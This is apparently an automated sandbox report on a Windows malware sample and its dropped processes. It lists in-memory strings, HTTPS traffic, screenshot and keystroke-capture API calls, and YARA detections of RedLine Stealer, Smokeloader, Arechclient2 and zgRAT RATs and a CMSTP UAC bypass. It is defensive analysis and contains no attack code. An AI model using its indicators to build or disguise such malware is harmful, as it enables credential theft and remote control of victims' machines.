Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/DHJKKEGI
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0020C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

3_2_0020C8B0

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_6C72A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

3_2_6C72A5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367BB15	0_2_0367BB15
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C3F8	0_2_0367C3F8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367CA63	0_2_0367CA63
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697AE7	0_2_03697AE7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C131	0_2_0367C131
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_036789C8	0_2_036789C8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368B989	0_2_0368B989
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03682607	0_2_03682607
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367F6A8	0_2_0367F6A8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C6B3	0_2_0367C6B3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367BE87	0_2_0367BE87
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD06BE0	2_2_6BD06BE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0BA0	2_2_6BCA0BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC08BAC	2_2_6BC08BAC
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7EA80	2_2_6BC7EA80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7CA70	2_2_6BC7CA70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCAEA00	2_2_6BCAEA00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB8A30	2_2_6BCB8A30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1C9E0	2_2_6BD1C9E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC349F0	2_2_6BC349F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC909A0	2_2_6BC909A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA9A0	2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC09B0	2_2_6BCC09B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC38960	2_2_6BC38960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC56900	2_2_6BC56900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCEC8C0	2_2_6BCEC8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD068E0	2_2_6BD068E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD4840	2_2_6BCD4840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC50820	2_2_6BC50820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8A820	2_2_6BC8A820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC00FE0	2_2_6BC00FE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDEFF0	2_2_6BCDEFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD48FB0	2_2_6BD48FB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0EFB0	2_2_6BC0EFB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6EF40	2_2_6BC6EF40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC2F70	2_2_6BCC2F70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC06F10	2_2_6BC06F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40F20	2_2_6BD40F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0AEC0	2_2_6BC0AEC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0EC0	2_2_6BCA0EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC86E90	2_2_6BC86E90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9EE70	2_2_6BC9EE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE0E20	2_2_6BCE0E20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD8CDC0	2_2_6BD8CDC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC96D90	2_2_6BC96D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC04DB0	2_2_6BC04DB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD2AD50	2_2_6BD2AD50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCED70	2_2_6BCCED70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD88D20	2_2_6BD88D20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5ECD0	2_2_6BC5ECD0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBFECC0	2_2_6BBFECC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0AC60	2_2_6BC0AC60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC6C00	2_2_6BCC6C00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDAC30	2_2_6BCDAC30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC543E0	2_2_6BC543E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC323A0	2_2_6BC323A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5E3B0	2_2_6BC5E3B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC08340	2_2_6BC08340
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD42370	2_2_6BD42370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC02370	2_2_6BC02370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1C360	2_2_6BD1C360
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC96370	2_2_6BC96370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC72320	2_2_6BC72320
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD862C0	2_2_6BD862C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD22A0	2_2_6BCD22A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCE2B0	2_2_6BCCE2B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC98250	2_2_6BC98250
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC88260	2_2_6BC88260
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCA210	2_2_6BCCA210
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD8220	2_2_6BCD8220
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC001E0	2_2_6BC001E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC68140	2_2_6BC68140
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC76130	2_2_6BC76130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE4130	2_2_6BCE4130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF8090	2_2_6BBF8090
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC100B0	2_2_6BC100B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDC0B0	2_2_6BCDC0B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC4E070	2_2_6BC4E070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCC000	2_2_6BCCC000
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC8010	2_2_6BCC8010
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC2A7D0	2_2_6BC2A7D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC80700	2_2_6BC80700
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC246D0	2_2_6BC246D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5E6E0	2_2_6BC5E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9E6E0	2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5C650	2_2_6BC5C650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF45B0	2_2_6BBF45B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCA5E0	2_2_6BCCA5E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8E5F0	2_2_6BC8E5F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD48550	2_2_6BD48550
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC58540	2_2_6BC58540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD04540	2_2_6BD04540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC62560	2_2_6BC62560
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0570	2_2_6BCA0570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC464D0	2_2_6BC464D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9A4D0	2_2_6BC9A4D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD2A480	2_2_6BD2A480
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC18460	2_2_6BC18460
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC64420	2_2_6BC64420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8A430	2_2_6BC8A430
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC47BF0	2_2_6BC47BF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF1B80	2_2_6BBF1B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE5B90	2_2_6BCE5B90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC59BA0	2_2_6BC59BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC9BB0	2_2_6BCC9BB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDFB60	2_2_6BCDFB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC4BB20	2_2_6BC4BB20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC01AE0	2_2_6BC01AE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDDAB0	2_2_6BCDDAB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD89A50	2_2_6BD89A50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC3FA10	2_2_6BC3FA10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA1A10	2_2_6BCA1A10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCFDA30	2_2_6BCFDA30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC999C0	2_2_6BC999C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC399D0	2_2_6BC399D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC659F0	2_2_6BC659F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC979F0	2_2_6BC979F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC11980	2_2_6BC11980
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD1990	2_2_6BCD1990
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7F960	2_2_6BC7F960
